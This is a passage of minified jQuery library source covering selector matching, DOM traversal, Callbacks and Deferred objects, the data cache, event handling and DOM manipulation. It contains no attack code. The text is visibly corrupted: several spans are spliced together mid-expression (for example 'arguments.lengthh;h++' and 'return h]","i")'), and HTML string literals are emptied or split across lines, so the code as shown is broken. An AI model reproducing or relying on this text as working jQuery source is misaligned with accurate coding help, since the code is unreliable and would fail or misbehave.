a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);m.find=s,m.expr=s.selectors,m.expr[":"]=m.expr.pseudos,m.unique=s.uniqueSort,m.text=s.getText,m.isXMLDoc=s.isXML,m.contains=s.contains;var t=m.expr.match.needsContext,u=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,v=/^.[^:#\[\.,]*$/;function w(a,b,c){if(m.isFunction(b))return m.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return m.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(v.test(b))return m.filter(b,a,c);b=m.filter(b,a)}return m.grep(a,function(a){return m.inArray(a,b)>=0!==c})}m.filter=function(a,b,c){var d=b[0];return 
c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?m.find.matchesSelector(d,a)?[d]:[]:m.find.matches(a,m.grep(b,function(a){return 1===a.nodeType}))},m.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(m(a).filter(function(){for(b=0;e>b;b++)if(m.contains(d[b],this))return!0}));for(b=0;e>b;b++)m.find(a,d[b],c);return c=this.pushStack(e>1?m.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(w(this,a||[],!1))},not:function(a){return this.pushStack(w(this,a||[],!0))},is:function(a){return!!w(this,"string"==typeof a&&t.test(a)?m(a):a||[],!1).length}});var x,y=a.document,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=m.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||x).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof m?b[0]:b,m.merge(this,m.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:y,!0)),u.test(c[1])&&m.isPlainObject(b))for(c in b)m.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=y.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return x.find(a);this.length=1,this[0]=d}return this.context=y,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):m.isFunction(a)?"undefined"!=typeof x.ready?x.ready(a):a(m):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),m.makeArray(a,this))};A.prototype=m.fn,x=m(y);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};m.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!m(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),m.fn.extend({has:function(a){var b,c=m(a,this),d=c.length;return 
this.filter(function(){for(b=0;d>b;b++)if(m.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=t.test(a)||"string"!=typeof a?m(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&m.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?m.unique(f):f)},index:function(a){return a?"string"==typeof a?m.inArray(this[0],m(a)):m.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(m.unique(m.merge(this.get(),m(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}m.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return m.dir(a,"parentNode")},parentsUntil:function(a,b,c){return m.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return m.dir(a,"nextSibling")},prevAll:function(a){return m.dir(a,"previousSibling")},nextUntil:function(a,b,c){return m.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return m.dir(a,"previousSibling",c)},siblings:function(a){return m.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return m.sibling(a.firstChild)},contents:function(a){return m.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:m.merge([],a.childNodes)}},function(a,b){m.fn[a]=function(c,d){var e=m.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=m.filter(d,e)),this.length>1&&(C[a]||(e=m.unique(e)),B.test(a)&&(e=e.reverse())),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return m.each(a.match(E)||[],function(a,c){b[c]=!0}),b}m.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):m.extend({},a);var 
b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){m.each(b,function(b,c){var d=m.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&m.each(arguments,function(a,c){var d;while((d=m.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?m.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},m.extend({Deferred:function(a){var b=[["resolve","done",m.Callbacks("once memory"),"resolved"],["reject","fail",m.Callbacks("once memory"),"rejected"],["notify","progress",m.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return m.Deferred(function(c){m.each(b,function(b,f){var g=m.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&m.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?m.extend(a,d):d}},e={};return d.pipe=d.then,m.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return 
e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&m.isFunction(a.promise)?e:0,g=1===f?a:m.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&m.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;m.fn.ready=function(a){return m.ready.promise().done(a),this},m.extend({isReady:!1,readyWait:1,holdReady:function(a){a?m.readyWait++:m.ready(!0)},ready:function(a){if(a===!0?!--m.readyWait:!m.isReady){if(!y.body)return setTimeout(m.ready);m.isReady=!0,a!==!0&&--m.readyWait>0||(H.resolveWith(y,[m]),m.fn.triggerHandler&&(m(y).triggerHandler("ready"),m(y).off("ready")))}}});function I(){y.addEventListener?(y.removeEventListener("DOMContentLoaded",J,!1),a.removeEventListener("load",J,!1)):(y.detachEvent("onreadystatechange",J),a.detachEvent("onload",J))}function J(){(y.addEventListener||"load"===event.type||"complete"===y.readyState)&&(I(),m.ready())}m.ready.promise=function(b){if(!H)if(H=m.Deferred(),"complete"===y.readyState)setTimeout(m.ready);else if(y.addEventListener)y.addEventListener("DOMContentLoaded",J,!1),a.addEventListener("load",J,!1);else{y.attachEvent("onreadystatechange",J),a.attachEvent("onload",J);var c=!1;try{c=null==a.frameElement&&y.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!m.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}I(),m.ready()}}()}return H.promise(b)};var K="undefined",L;for(L in m(k))break;k.ownLast="0"!==L,k.inlineBlockNeedsLayout=!1,m(function(){var 
a,b,c,d;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",k.inlineBlockNeedsLayout=a=3===b.offsetWidth,a&&(c.style.zoom=1)),c.removeChild(d))}),function(){var a=y.createElement("div");if(null==k.deleteExpando){k.deleteExpando=!0;try{delete a.test}catch(b){k.deleteExpando=!1}}a=null}(),m.acceptData=function(a){var b=m.noData[(a.nodeName+" ").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var M=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,N=/([A-Z])/g;function O(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(N,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:M.test(c)?m.parseJSON(c):c}catch(e){}m.data(a,b,c)}else c=void 0}return c}function P(a){var b;for(b in a)if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h; + if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||m.guid++:h),j[k]||(j[k]=i?{}:{toJSON:m.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=m.extend(j[k],b):j[k].data=m.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){m.isArray(b)?b=b.concat(m.map(b,m.camelCase)):b in d?b=[b]:(b=m.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete 
g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?m.cache[a[m.expando]]:a[m.expando],!!a&&!P(a)},data:function(a,b,c){return Q(a,b,c)},removeData:function(a,b){return R(a,b)},_data:function(a,b,c){return Q(a,b,c,!0)},_removeData:function(a,b){return R(a,b,!0)}}),m.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=m.data(f),1===f.nodeType&&!m._data(f,"parsedAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=m.camelCase(d.slice(5)),O(f,d,e[d])));m._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){m.data(this,a)}):arguments.length>1?this.each(function(){m.data(this,a,b)}):f?O(f,a,m.data(f,a)):void 0},removeData:function(a){return this.each(function(){m.removeData(this,a)})}}),m.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=m._data(a,b),c&&(!d||m.isArray(c)?d=m._data(a,b,m.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=m.queue(a,b),d=c.length,e=c.shift(),f=m._queueHooks(a,b),g=function(){m.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return m._data(a,c)||m._data(a,c,{empty:m.Callbacks("once memory").add(function(){m._removeData(a,b+"queue"),m._removeData(a,c)})})}}),m.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.lengthh;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},W=/^(?:checkbox|radio)$/i;!function(){var a=y.createElement("input"),b=y.createElement("div"),c=y.createDocumentFragment();if(b.innerHTML="
a",k.leadingWhitespace=3===b.firstChild.nodeType,k.tbody=!b.getElementsByTagName("tbody").length,k.htmlSerialize=!!b.getElementsByTagName("link").length,k.html5Clone="<:nav>"!==y.createElement("nav").cloneNode(!0).outerHTML,a.type="checkbox",a.checked=!0,c.appendChild(a),k.appendChecked=a.checked,b.innerHTML="",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,c.appendChild(b),b.innerHTML="",k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,k.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){k.noCloneEvent=!1}),b.cloneNode(!0).click()),null==k.deleteExpando){k.deleteExpando=!0;try{delete b.test}catch(d){k.deleteExpando=!1}}}(),function(){var b,c,d=y.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(k[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),k[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var X=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|pointer|contextmenu)|click/,$=/^(?:focusinfocus|focusoutblur)$/,_=/^([^.]*)(?:\.(.+)|)$/;function ab(){return!0}function bb(){return!1}function cb(){try{return y.activeElement}catch(a){}}m.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=m.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof m===K||a&&m.event.triggered===a.type?void 
0:m.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(E)||[""],h=b.length;while(h--)f=_.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=m.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=m.event.special[o]||{},l=m.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&m.expr.match.needsContext.test(e),namespace:p.join(".")},i),(n=g[o])||(n=g[o]=[],n.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?n.splice(n.delegateCount++,0,l):n.push(l),m.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m.hasData(a)&&m._data(a);if(r&&(k=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=_.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=m.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,n=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=n.length;while(f--)g=n[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(n.splice(f,1),g.selector&&n.delegateCount--,l.remove&&l.remove.call(a,g));i&&!n.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||m.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)m.event.remove(a,o+b[j],c,d,!0);m.isEmptyObject(k)&&(delete r.handle,m._removeData(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,l,n,o=[d||y],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||y,3!==d.nodeType&&8!==d.nodeType&&!$.test(p+m.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[m.expando]?b:new m.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 
0,b.target||(b.target=d),c=null==c?[b]:m.makeArray(c,[b]),k=m.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!m.isWindow(d)){for(i=k.delegateType||p,$.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||y)&&o.push(l.defaultView||l.parentWindow||a)}n=0;while((h=o[n++])&&!b.isPropagationStopped())b.type=n>1?i:k.bindType||p,f=(m._data(h,"events")||{})[b.type]&&m._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&m.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&m.acceptData(d)&&g&&d[p]&&!m.isWindow(d)){l=d[g],l&&(d[g]=null),m.event.triggered=p;try{d[p]()}catch(r){}m.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=m.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(m._data(this,"events")||{})[a.type]||[],k=m.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=m.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((m.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?m(c,this).index(i)>=0:m.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return 
h]","i"),hb=/^\s+/,ib=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,jb=/<([\w:]+)/,kb=/\s*$/g,rb={option:[1,""],legend:[1,"
","
"],area:[1,"",""],param:[1,"",""],thead:[1,"","
"],tr:[2,"","
"],col:[2,"","
"],td:[3,"","
"],_default:k.htmlSerialize?[0,"",""]:[1,"X
","
"]},sb=db(y),tb=sb.appendChild(y.createElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==K?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||m.nodeName(d,b)?f.push(d):m.merge(f,ub(d,b));return void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function xb(a){return a.type=(null!==m.find.attr(a,"type"))+"/"+a.type,a}function yb(a){var b=pb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function zb(a,b){for(var c,d=0;null!=(c=a[d]);d++)m._data(c,"globalEval",!b||m._data(b[d],"globalEval"))}function Ab(a,b){if(1===b.nodeType&&m.hasData(a)){var c,d,e,f=m._data(a),g=m._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)m.event.add(b,c,h[c][d])}g.data&&(g.data=m.extend({},g.data))}}function Bb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!k.noCloneEvent&&b[m.expando]){e=m._data(b);for(d in e.events)m.removeEvent(b,d,e.handle);b.removeAttribute(m.expando)}"script"===c&&b.text!==a.text?(xb(b).text=a.text,yb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&W.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var 
d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!gb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(tb.innerHTML=a.outerHTML,tb.removeChild(f=tb.firstChild)),!(k.noCloneEvent&&k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||m.isXMLDoc(a)))for(d=ub(f),h=ub(a),g=0;null!=(e=h[g]);++g)d[g]&&Bb(e,d[g]);if(b)if(c)for(h=h||ub(a),d=d||ub(f),g=0;null!=(e=h[g]);g++)Ab(e,d[g]);else Ab(a,f);return d=ub(f,"script"),d.length>0&&zb(d,!i&&ub(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,l,n=a.length,o=db(b),p=[],q=0;n>q;q++)if(f=a[q],f||0===f)if("object"===m.type(f))m.merge(p,f.nodeType?[f]:f);else if(lb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(jb.exec(f)||["",""])[1].toLowerCase(),l=rb[i]||rb._default,h.innerHTML=l[1]+f.replace(ib,"<$1>")+l[2],e=l[0];while(e--)h=h.lastChild;if(!k.leadingWhitespace&&hb.test(f)&&p.push(b.createTextNode(hb.exec(f)[0])),!k.tbody){f="table"!==i||kb.test(f)?""!==l[1]||kb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)m.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}m.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),k.appendChecked||m.grep(ub(p,"input"),vb),q=0;while(f=p[q++])if((!d||-1===m.inArray(f,d))&&(g=m.contains(f.ownerDocument,f),h=ub(o.appendChild(f),"script"),g&&zb(h),c)){e=0;while(f=h[e++])ob.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=m.expando,j=m.cache,l=k.deleteExpando,n=m.event.special;null!=(d=a[h]);h++)if((b||m.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)n[e]?m.event.remove(d,e):m.removeEvent(d,e,g.handle);j[f]&&(delete j[f],l?delete d[i]:typeof d.removeAttribute!==K?d.removeAttribute(i):d[i]=null,c.push(f))}}}),m.fn.extend({text:function(a){return V(this,function(a){return void 
0===a?m.text(this):this.empty().append((this[0]&&this[0].ownerDocument||y).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?m.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||m.cleanData(ub(c)),c.parentNode&&(b&&m.contains(c.ownerDocument,c)&&zb(ub(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&m.cleanData(ub(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&m.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return m.clone(this,a,b)})},html:function(a){return V(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(fb,""):void 0;if(!("string"!=typeof a||mb.test(a)||!k.htmlSerialize&&gb.test(a)||!k.leadingWhitespace&&hb.test(a)||rb[(jb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(ib,"<$1>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(m.cleanData(ub(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,m.cleanData(ub(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return 
this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,n=this,o=l-1,p=a[0],q=m.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&nb.test(p))return this.each(function(c){var d=n.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(i=m.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=m.map(ub(i,"script"),xb),f=g.length;l>j;j++)d=i,j!==o&&(d=m.clone(d,!0,!0),f&&m.merge(g,ub(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,m.map(g,yb),j=0;f>j;j++)d=g[j],ob.test(d.type||"")&&!m._data(d,"globalEval")&&m.contains(h,d)&&(d.src?m._evalUrl&&m._evalUrl(d.src):m.globalEval((d.text||d.textContent||d.innerHTML||"").replace(qb,"")));i=c=null}return this}}),m.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){m.fn[a]=function(a){for(var c,d=0,e=[],g=m(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),m(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Cb,Db={};function Eb(b,c){var d,e=m(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:m.css(e[0],"display");return e.detach(),f}function Fb(a){var b=y,c=Db[a];return c||(c=Eb(a,b),"none"!==c&&c||(Cb=(Cb||m("